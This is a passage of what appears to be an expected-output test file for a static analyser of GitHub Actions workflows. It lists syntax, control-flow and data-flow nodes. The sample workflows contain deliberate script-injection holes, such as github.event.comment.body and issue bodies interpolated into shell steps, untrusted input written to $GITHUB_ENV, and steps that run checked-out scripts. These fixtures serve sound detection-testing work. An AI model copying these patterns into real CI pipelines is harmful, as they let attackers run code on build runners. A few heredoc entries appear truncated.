.github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | 
Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| 
.github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| 
.github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| 
.github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| 
.github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> 